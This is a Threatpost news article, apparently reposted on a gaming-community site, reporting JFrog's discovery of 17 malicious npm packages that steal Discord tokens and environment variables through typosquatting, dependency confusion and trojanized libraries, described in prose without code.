Malicious npm Code Packages Built for Hijacking Discord Servers – Threatpost

Share on facebook
Share on twitter
Share on linkedin

Newsletter
Join thousands of people who receive the latest breaking cybersecurity news every day.
The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.
Share this article:
The lurking code-bombs lift Discord tokens from users of any applications that pulled the packages into their code bases.
A series of malicious packages in the Node.js package manager (npm) code repository are looking to harvest Discord tokens, which can be used to take over unsuspecting users’ accounts and servers.
The npm repository is an open-source home for JavaScript developers to share and reuse code blocks. The packages can represent a supply-chain threat given that they can be used as building blocks in various web applications. Any applications corrupted by malicious code can attack its users.
According to the JFrog Security research team, in this case a set of 17 malicious packages were published, with varying payloads and tactics. However, they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files.
Infosec Insiders Newsletter
“The packages’ payloads are varied, ranging from infostealers up to full remote-access backdoors,” researchers said in a Wednesday advisory. “Additionally, the packages have different infection tactics, including typosquatting, dependency confusion and trojan functionality.”
There are a few reasons, apart from its massive user base, that Discord is an attractive target, researchers noted:
JFrog researchers noted that it’s easy to find Discord token grabbers on GitHub, which come complete with instructions. These can be used to develop a malware-laden package.
“Any novice hacker can do this with ease in a matter of minutes,” they said. “It’s important to note these payloads are less likely to be caught by antivirus solutions, versus a full-on RAT backdoor, since a Discord stealer does not modify any files, does not register itself anywhere (to be executed on next boot, for example) and does not perform suspicious operations such as spawning child processes.”
To lure users into downloading the packages, the malicious projects employ various tactics. For instance, two of the 17 packages, called “discord-lofy” and “discord-selfbot-v14,” masquerade as modifications of the legitimate library discord.js, which enables interaction with the Discord API.
“The malware’s author took the original discord.js library as the base and injected obfuscated malicious code into the file src/client/actions/UserGet.js,” according to JFrog, which added, “In classic trojan manner, the packages attempt to misdirect the victim by copying the README.md from the original package.”
Another, dubbed the “fix-error” package, claims to “fix errors in discord selfbot.” In actuality, it uses an obfuscated version of the PirateStealer tool, which steals private data stored in the Discord client by injecting malicious JavaCcript code – such as credit cards, login credentials and personally identifiable information (PII).
“The injected code spies on the user and sends back the stolen information to a hardcoded Webhook address,” researchers explained.
Fully 10 of the packages eschew any legitimate or trojanized functionality at all, and instead just contain a small snippet of malicious code, researchers said. These all steal environment variables, which are dynamic-named values that can affect the way running processes will behave on a computer.
“This is a dangerous payload since environment variables are a prime location for keeping secrets that need to be used by the runtime (as they are safer than keeping the secrets in cleartext storage or passing the secrets via command-line variables),” researchers explained. “The types of machines targeted by these malicious packages, namely developer and CI/CD machines, are very likely to contain such secrets and access keys in the user’s environment.”
The npm code maintainers have removed the flagged packages, which nonetheless live on in any applications they’re built into.
Using malicious packages as a cyberattack vector has become more and more common, and not just in npm. Here’s a rundown of recent discoveries:
“We are witnessing a recent barrage of malicious software hosted and delivered through open-source software repositories,” according to JFrog researchers. “Public repositories have become a handy instrument for malware distribution: the repository’s server is a trusted resource, and communication with it does not raise the suspicion of any antivirus or firewall. In addition, the ease of installation via automation tools such as the npm client, provides a ripe attack vector.”
There’s a sea of unstructured data on the internet relating to the latest security threats. REGISTER TODAY to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This LIVE, interactive Threatpost Town Hall, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.
Register NOW for the LIVE event!
 
Share this article:
Adobe updated its recent out-of-band security advisory to add another critical bug, while researchers put out a PoC for the one it emergency-fixed last weekend.
An oversight in a WordPress plug-in exposes PII and authentication data to malicious insiders.
Researchers said a Jan. 27 attack that aired footage of opposition leaders calling for assassination of Iran’s Supreme Leader was a clumsy and unsophisticated wiper attack.



This site uses Akismet to reduce spam. Learn how your comment data is processed.
Join thousands of people who receive the latest breaking cybersecurity news every day.
Get the latest breaking news delivered daily to your inbox.
The First Stop For Security News
Infosec Insider content is written by a trusted community of Threatpost cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.
Sponsored Content is paid for by an advertiser. Sponsored content is written and edited by members of our sponsor community. This content creates an opportunity for a sponsor to provide insight and commentary from their point-of-view directly to the Threatpost audience. The Threatpost editorial team does not participate in the writing or editing of Sponsored Content.

source

Bellscord

Bellscord

Leave a Replay

About Us

Bellscord is a Gaming Community which hosts its own Minecraft Server and Discord Community. Bellscord Communities can be found across multiple platforms. Our aim is to build a big and active community.

Recent Posts